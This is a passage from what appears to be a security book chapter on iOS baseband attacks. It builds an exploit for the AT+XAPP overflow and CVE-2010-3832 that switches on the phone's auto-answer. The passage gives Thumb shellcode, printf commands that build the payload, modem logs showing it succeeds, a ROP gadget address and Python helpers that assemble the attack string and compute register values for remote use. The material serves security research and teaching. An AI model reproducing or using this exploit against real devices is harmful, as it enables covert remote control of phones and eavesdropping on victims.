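    """Addresses of t1[12], t1[13] and t2[14] read by get_at_sreg_base_ptr(a1, a2)."""
    t1 = TABLE1 + 4 * 15 * a1
    t2 = TABLE2 + 4 * 17 * a2
    return t1 + 4 * 12, t1 + 4 * 13, t2 + 4 * 14


def sreg_address(mem: dict, k: int, n: int) -> int:
    """Byte address that get_at_sreg_value(k, n) dereferences."""
    flag, offset, base = sreg_reads(9, k)
    # Same as the C code: the base is 0 when t1[12] is zero.
    ptr = (mem[base] + mem[offset]) if mem.get(flag, 0) else 0
    return (ptr + n + 8) & 0xFFFFFFFF
```

For the call made when querying S registers (a1 = 9, k = 0), sreg_reads(9, 0) gives 0xB01B2298, 0xB01B229C and 0xB01B2408.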
The plan takes shape: the knowledge gained from get_at_sreg_base_ptr and get_at_sreg_value allows you to set the S0 register remotely with a very short program. As a first step, you can write a little assembly program that sets the S0 ring counter locally through the at+xapp overflow. An example looks like this:
00000000 <write_ats0_reg>:
   0: 2107 movs r1, #7              /* can't load #9 directly: 0x09 is a tab (whitespace) */
   2: 1c88 adds r0, r1, #2          /* r0 = 9 */
   4: 1a49 subs r1, r1, r1          /* r1 = 0 */
   6: 47a8 blx r5                   /* call 0xA01B9F1B */
   8: 2401 movs r4, #1
   a: 7204 strb r4, [r0, #8]        /* set S0 = 1 */
   c: 1b20 subs r0, r4, r4          /* r0 = 0, indicates ERROR */
   e: b00a add sp, #0x28            /* adjust stack pointer */
  10: bd70 pop {r4, r5, r6, pc}     /* clean continuation */
  12: 46c0 nop                      /* nop needed to align to word boundary */
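The comment on the first instruction points at the main constraint: the shellcode travels inside an AT command string, so some byte values must not appear. The sketch below serializes the halfwords of the write_ats0_reg listing little-endian and scans them for bad bytes. Only 0x09 is implied by the listing; treating the double quote 0x22 as bad is our assumption, since it would end the quoted AT+XAPP argument. The helper names are ours.

```python
import struct

# Halfword encodings copied from the write_ats0_reg listing.
HALFWORDS = [0x2107, 0x1C88, 0x1A49, 0x47A8, 0x2401,
             0x7204, 0x1B20, 0xB00A, 0xBD70, 0x46C0]

# 0x09 per the listing's comment; 0x22 (") is an assumption.
BAD_BYTES = {0x09, 0x22}


def thumb_bytes(halfwords) -> bytes:
    """Serialize 16-bit Thumb instructions in little-endian byte order."""
    return b"".join(struct.pack("<H", hw) for hw in halfwords)


def bad_positions(code: bytes, bad=BAD_BYTES) -> list:
    """Offsets of bytes that would break the AT command string."""
    return [i for i, b in enumerate(code) if b in bad]


def movs_imm(rd: int, imm8: int) -> int:
    """Encode Thumb 'movs rd, #imm8' for rd in r0-r7."""
    return 0x2000 | (rd << 8) | imm8
```

The serialized bytes start 07 21 88 1c, matching the escape sequences in the printf commands used to test the payload, and contain no bad byte, whereas thumb_bytes([movs_imm(1, 9)]) begins with the offending 0x09.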
A primitive way to test the write_ats0_reg code is the following:
# printf 'AT+XAPP="####################################' > xapp-bin
# printf '4444\x1b\x9f\x1b\xA066667777\xF5\x2C\x0B\xB0' >> xapp-bin
# printf '\x07\x21\x88\x1c\x49\x1a\xa8\x47\x01\x24\x04' >> xapp-bin
# printf '\x72\x20\x1b\x0a\xb0\x70\xbd\xc0\x46"' >> xapp-bin
# ./sendmodem "`cat xapp-bin`"
Sending command to modem: AT
---.+
AT
OK
Sending command to modem: AT+XAPP="####################################444466667 777?, ?!?I?G$r p??F"
-..+
AT+XAPP="####################################444466667777?, ?!?I?G$r p??F"
ERROR
# ./sendmodem 'ATS0?'
Sending command to modem: AT
-.+
AT
OK
Sending command to modem: ATS0?
-...+
ATS0?
001
OK
#
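The printf commands are easier to audit when the command is assembled programmatically. The sketch below rebuilds the same byte string: the run of '#' padding (36 characters in the printf line), five 32-bit words, the shellcode, and the closing quote. That 0xA01B9F1B is the value loaded into r5 follows from the shellcode's blx r5; reading 0xB00B2CF5 as the Thumb address where execution resumes is our assumption, as are the function and parameter names.

```python
import struct

# write_ats0_reg shellcode bytes, as in the printf commands.
SHELLCODE = bytes.fromhex("0721881c491aa84701240472201b0ab070bdc046")


def build_xapp(padding: int = 36,
               sreg_fn: int = 0xA01B9F1B,
               resume: int = 0xB00B2CF5,
               shellcode: bytes = SHELLCODE) -> bytes:
    """Rebuild the AT+XAPP test command from its parts."""
    cmd = b'AT+XAPP="' + b"#" * padding
    cmd += b"4444"                        # filler word
    cmd += struct.pack("<I", sreg_fn)     # called by the shellcode via blx r5
    cmd += b"6666" + b"7777"              # filler words
    cmd += struct.pack("<I", resume)      # assumed: Thumb address to continue at
    return cmd + shellcode + b'"'
```

Changing a single parameter, for example the resume address, then produces a consistent new command without hand-editing escape sequences.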
As the ATS0? query shows, the at+xapp payload manages to set the S0 register to one. If you call the iPhone now, it will automatically answer the call after the first ring. Let us now come to the last step and build the payload for switching on this feature remotely.
By modifying the at+xapp payload slightly so that it crashes instead of writing the value, you can find out that the S0 register lives at address 0xB002D768 in memory. You could then, for example, use the following gadget to turn on auto-answer remotely:
0xA01EC43C 1C 61 C4 E5 STRB  R6, [R4,#0x11C]
0xA01EC440 F0 81 BD E8 LDMFD SP!, {R4-R8,PC}
Note that execution must continue cleanly after the value 1 has been written to the above-mentioned address. Altogether, this gives a single message of less than 100 bytes that succinctly demonstrates the exploitability of CVE-2010-3832.
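The register values the gadget needs follow from simple arithmetic: STRB stores the low byte of R6 at R4 + 0x11C, so R4 must hold the S0 address minus 0x11C and R6 must hold 1, after which LDMFD pops R4-R8 and PC from the stack for the continuation. The second crash log shows r4, r5, r6 and the program counter carrying payload values, which is what makes this gadget usable. A minimal sketch of the computation (helper name ours); which TMSI words end up in which register has to be read off your own crash logs.

```python
GADGET = 0xA01EC43C        # STRB R6, [R4,#0x11C] ; LDMFD SP!, {R4-R8,PC}
STRB_OFFSET = 0x11C        # immediate offset of the STRB
S0_ADDR = 0xB002D768       # address of the S0 register


def gadget_registers(target: int = S0_ADDR, value: int = 1) -> dict:
    """Register values that make the gadget write `value` to byte `target`."""
    return {
        "r4": (target - STRB_OFFSET) & 0xFFFFFFFF,
        "r6": value & 0xFF,      # STRB stores only the low byte of R6
        "pc": GADGET,
    }
```

For the default arguments this yields r4 = 0xB002D64C, r6 = 1 and pc = 0xA01EC43C.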
We have given a thorough introduction to baseband attacks against iOS devices. Starting with background knowledge on cellular networks, we moved on to the inner workings of the real-time operating systems running on the baseband chips of the various generations of iOS devices and the intricacies of their heap memory managers.
These rather theoretical aspects were then counterbalanced by a quick-start guide for getting a quick-and-dirty OpenBTS setup up and running. This setup lets you run your own GSM test network for researching over-the-air baseband attacks in the lab.
We then dissected the actual cellular stacks, discussed their attack surface, and showed you techniques for finding bugs yourself. Finally, we provided examples of two public vulnerabilities (one local, one remote) and explained the workings of the ultrasn0w unlock.